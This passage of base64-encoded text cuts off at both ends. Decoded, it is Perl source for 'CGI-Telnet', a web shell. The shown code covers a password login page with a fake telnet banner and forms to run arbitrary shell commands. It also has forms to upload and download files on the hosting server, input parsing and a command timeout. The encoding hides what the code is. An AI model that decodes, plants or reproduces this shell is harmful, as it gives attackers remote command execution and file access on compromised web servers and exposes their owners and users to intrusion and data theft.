8gdGhlCgkJCQkjIGJyb3dzZXIgYXMgc29vbiBhcyBpdCBpcyBvdXRwdXQsIG90aGVyd2lzZQoJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UKCQkJCSMgcGluZywgc28gdGhhdCB5b3UgY2FuIHNlZSB0aGUgb3V0cHV0IGFzIGl0CgkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJzZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQKIyBwYXJzZXMgR0VULCBQT1NUIGFuZCBtdWx0aXBhcnQvZm9ybS1kYXRhIHRoYXQgaXMgdXNlZCBmb3IgdXBsb2FkaW5nIGZpbGVzLgojIFRoZSBmaWxlbmFtZSBpcyBzdG9yZWQgaW4gJGlueydmJ30gYW5kIHRoZSBkYXRhIGlzIHN0b3JlZCBpbiAkaW57J2ZpbGVkYXRhJ30uCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAkaW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YKIyB0aGUgdmFyaWFibGUuIE5vdGU6IE1vc3Qgb2YgdGhlIGNvZGUgaW4gdGhpcyBmdW5jdGlvbiBpcyB0YWtlbiBmcm9tIG90aGVyIENHSQojIHNjcmlwdHMuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJlYWRQYXJzZSAKewoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsKCWxvY2FsICgkaSwgJGxvYywgJGtleSwgJHZhbCk7CgkKCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOwoKCWlmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIkdFVCIpCgl7CgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307Cgl9CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikKCXsKCQliaW5tb2RlKFNURElOKSBpZiAkTXVsdGlwYXJ0Rm9ybURhdGEgJiAkV2luTlQ7CgkJcmVhZChTVERJTiwgJGluLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsKCX0KCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBkYXRhCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykKCXsKCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZlciB0byBSRkMxODY3IAoJCUBsaXN0ID0gc3BsaXQoLyRCb3VuZGFyeS8sICRpbik7IAoJCSRIZWFkZXJCb2R5ID0gJGxpc3RbMV07CgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOwoJCSRIZWFkZXIgPSAkYDsKCQkkQm9keSA9ICQnOwogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlCgkJJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7CgkJJEhlYWRlciA9fiAvZmlsZW5hbWU9XCIoLispXCIvOyAKCQkkaW57J2YnfSA9ICQxOyAKCQkkaW57J2YnfSA9fiBzL1wiLy9nOwoJCSRpbnsnZid9ID1+IHMvXHMvL2c7CgoJCSMgcGFyc2UgdHJhaWxlcgoJCWZvcigkaT0yOyAkbGlzdFskaV07ICRpKyspCgkJeyAKCQkJJGxpc3RbJGldID1+IHMvXi4rbmFtZT0kLy87CgkJCSRsaXN0WyRpXSA9fiAvXCIoXHcrKVwiLzsKCQkJJGtleSA9ICQxOwoJCQkkdmFsID0gJCc7CgkJCSR2YWwgPX4gcy8oXihcclxuXHJcbnxcblxuKSl8KFxyXG4kfFxuJCkvL2c7CgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7CgkJCSRpbnska2V5fSA9ICR2YWw7IAoJCX0KCX0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQoJewoJCUBpbiA9IHNwbGl0KC8mLywgJGluKTsKCQlmb3JlYWNoICRpICgwIC4uICQjaW4pCgkJewoJCQkkaW5bJGldID1+IHMvXCsvIC9nOwoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOwoJCQkka2V5ID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsKCQkJJGlueyRrZXl9IC49ICR2YWw7CgkJfQoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIFBhZ2UgSGVhZGVyCiMgQXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludFBhZ2VIZWFkZXIKewoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7CgkkRW5jb2RlZEN1cnJlbnREaXIgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8dGl0bGU+Q0dJLVRlbG5ldCBWZXJzaW9uIDEuMDwvdGl0bGU+CiRIdG1sTWV0YUhlYWRlcgo8L2hlYWQ+Cjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5mb2N1cygpIiBiZ2NvbG9yPSIjMDAwMDAwIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1hcmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiPgo8dGFibGUgYm9yZGVyPSIxIiB3aWR0aD0iMTAwJSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIyIj4KPHRyPgo8dGQgYmdjb2xvcj0iI0MyQkZBNSIgYm9yZGVyY29sb3I9IiMwMDAwODAiIGFsaWduPSJjZW50ZXIiPgo8Yj48Zm9udCBjb2xvcj0iIzAwMDA4MCIgc2l6ZT0iMiI+IzwvZm9udD48L2I+PC90ZD4KPHRkIGJnY29sb3I9IiMwMDAwODAiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiIGNvbG9yPSIjRkZGRkZGIj48Yj5DR0ktVGVsbmV0IFZlcnNpb24gMS4wIC0gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9udD48L3RkPgo8L3RyPgo8dHI+Cjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjQzJCRkE1Ij48Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5EaXNjb25uZWN0PC9hPiB8CjxhIGhyZWY9Imh0dHA6Ly93d3cucm9oaXRhYi5jb20vY2dpc2NyaXB0cy9jZ2l0ZWxuZXQuaHRtbCI+SGVscDwvYT4KPC9mb250PjwvdGQ+CjwvdHI+CjwvdGFibGU+Cjxmb250IGNvbG9yPSIjQzBDMEMwIiBzaXplPSIzIj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCSRNZXNzYWdlID0gcSQ8cHJlPjxmb250IGNvbG9yPSIjNjY5OTk5Ij4gX19fX18gIF9fX19fICBfX19fXyAgICAgICAgICBfX19fXyAgICAgICAgXyAgICAgICAgICAgICAgIF8KLyAgX18gXHwgIF9fIFx8XyAgIF98ICAgICAgICB8XyAgIF98ICAgICAgfCB8ICAgICAgICAgICAgIHwgfAp8IC8gIFwvfCB8ICBcLyAgfCB8ICAgX19fX19fICAgfCB8ICAgIF9fXyB8IHwgXyBfXyAgICBfX18gfCB8Xwp8IHwgICAgfCB8IF9fICAgfCB8ICB8X19fX19ffCAgfCB8ICAgLyBfIFx8IHx8ICdfIFwgIC8gXyBcfCBfX3wKfCBcX18vXHwgfF9cIFwgX3wgfF8gICAgICAgICAgIHwgfCAgfCAgX18vfCB8fCB8IHwgfHwgIF9fL3wgfF8KIFxfX19fLyBcX19fXy8gXF9fXy8gICAgICAgICAgIFxfLyAgIFxfX198fF98fF98IHxffCBcX19ffCBcX198IDEuMAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAo8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPiAgICAgICAgICAgICAgICAgICAgICBfX19fX18gICAgICAgICAgICAgPC9mb250Pjxmb250IGNvbG9yPSIjQUU4MzAwIj7CqSAyMDAxLCBSb2hpdGFiIEJhdHJhPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4KICAgICAgICAgICAgICAgICAgIC4tJnF1b3Q7ICAgICAgJnF1b3Q7LS4KICAgICAgICAgICAgICAgICAgLyAgICAgICAgICAgIFwKICAgICAgICAgICAgICAgICB8ICAgICAgICAgICAgICB8CiAgICAgICAgICAgICAgICAgfCwgIC4tLiAgLi0uICAsfAogICAgICAgICAgICAgICAgIHwgKShfby8gIFxvXykoIHwKICAgICAgICAgICAgICAgICB8LyAgICAgL1wgICAgIFx8CiAgICAgICAoQF8gICAgICAgKF8gICAgIF5eICAgICBfKQogIF8gICAgICkgXDwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X19fX19fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+XDwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X188L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPnxJSUlJSUl8PC9mb250Pjxmb250IGNvbG9yPSIjODA4MDgwIj5fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+LzwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X19fX19fX19fX19fX19fX19fX19fX18KPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4gKF8pPC9mb250Pjxmb250IGNvbG9yPSIjODA4MDgwIj5AOEA4PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj57fTwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+Jmx0O19fX19fX19fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj58LVxJSUlJSUkvLXw8L2ZvbnQ+PGZvbnQgY29sb3I9IiM4MDgwODAiPl9fX19fX19fX19fX19fX19fX19fX19fXyZndDs8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPgogICAgICAgIClfLyAgICAgICAgXCAgICAgICAgICAvIAogICAgICAgKEAgICAgICAgICAgIGAtLS0tLS0tLWAKICAgICAgICAgICAgIDwvZm9udD48Zm9udCBjb2xvcj0iI0FFODMwMCI+VyBBIFIgTiBJIE4gRzogUHJpdmF0ZSBTZXJ2ZXI8L2ZvbnQ+PC9wcmU+CiQ7CiMnCglwcmludCA8PEVORDsKPGNvZGU+ClRyeWluZyAkU2VydmVyTmFtZS4uLjxicj4KQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPGJyPgpFc2NhcGUgY2hhcmFjdGVyIGlzIF5dCjxjb2RlPiRNZXNzYWdlCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQp7CglwcmludCA8PEVORDsKPGNvZGU+Cjxicj5sb2dpbjogYWRtaW48YnI+CnBhc3N3b3JkOjxicj4KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9naW5Gb3JtCnsKCXByaW50IDw8RU5EOwo8Y29kZT4KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CmxvZ2luOiBhZG1pbjxicj4KcGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgo8L2NvZGU+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBmb290ZXIgZm9yIHRoZSBIVE1MIFBhZ2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRQYWdlRm9vdGVyCnsKCXByaW50ICI8L2ZvbnQ+PC9ib2R5PjwvaHRtbD4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNhbiBiZSBhY2Nlc3NlcyB1c2luZyB0aGUKIyB2YXJpYWJsZSAkQ29va2llc3snJ30KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9nb3V0U2NyZWVuCnsKCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIExvZ3Mgb3V0IHRoZSB1c2VyIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gbG9naW4gYWdhaW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUGVyZm9ybUxvZ291dAp7CglwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9O1xuIjsgIyByZW1vdmUgcGFzc3dvcmQgY29va2llCgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkmUHJpbnRMb2dvdXRTY3JlZW47CgkmUHJpbnRMb2dpblNjcmVlbjsKCSZQcmludExvZ2luRm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBsb2dpbiB0aGUgdXNlci4gSWYgdGhlIHBhc3N3b3JkIG1hdGNoZXMsIGl0CiMgZGlzcGxheXMgYSBwYWdlIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHJ1biBjb21tYW5kcy4gSWYgdGhlIHBhc3N3b3JkIGRvZW5zJ3QKIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIKIyB0byBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQZXJmb3JtTG9naW4gCnsKCWlmKCRMb2dpblBhc3N3b3JkIGVxICRQYXNzd29yZCkgIyBwYXNzd29yZCBtYXRjaGVkCgl7CgkJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPSRMb2dpblBhc3N3b3JkO1xuIjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkJJlByaW50TG9naW5TY3JlZW47CgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZAoJCXsKCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOwoJCX0KCQkmUHJpbnRMb2dpbkZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CiRQcm9tcHQKPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBkb3dubG9hZCBmaWxlcwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludEZpbGVEb3dubG9hZEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iZG93bmxvYWQiPgokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4KRG93bmxvYWQ6IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+CjwvZm9ybT4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludEZpbGVVcGxvYWRGb3JtCnsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOwoJcHJpbnQgPDxFTkQ7Cjxjb2RlPgo8Zm9ybSBuYW1lPSJmIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KJFByb21wdCB1cGxvYWQ8YnI+PGJyPgpGaWxlbmFtZTogPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPgpPcHRpb25zOiAmbmJzcDs8aW5wdXQgdHlwZT0iY2hlY2tib3giIG5hbWU9Im8iIHZhbHVlPSJvdmVyd3JpdGUiPgpPdmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4KVXBsb2FkOiZuYnNwOyZuYnNwOyZuYnNwOzxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJ1cGxvYWQiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB0aW1lb3V0IGZvciBhIGNvbW1hbmQgZXhwaXJlcy4gV2UgbmVlZCB0bwojIHRlcm1pbmF0ZSB0aGUgc2NyaXB0IGltbWVkaWF0ZWx5LiBUaGlzIGZ1bmN0aW9uIGlzIHZhbGlkIG9ubHkgb24gVW5peC4gSXQgaXMKIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIENvbW1hbmRUaW1lb3V0CnsKCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7CgkJcHJpbnQgPDxFTkQ7CjwveG1wPgo8Y29kZT4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLgo8YnI+S2lsbGVkIGl0IQo8Y29kZT4KRU5ECgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCQlleGl0OwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQgZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUKIyBjb21tYW5kIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gZW50ZXIgYW5vdGhlciBjb21tYW5kLiBUaGUgY2hhbmdlIGRpcmVjdG9yeQojIGNvbW1hbmQgaXMgaGFuZGxlZCBkaWZmZXJlbnRseS4gSW4gdGhpcyBjYXNlLCB0aGUgbmV3IGRpcmVjdG9yeSBpcyBzdG9yZWQgaW4KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoI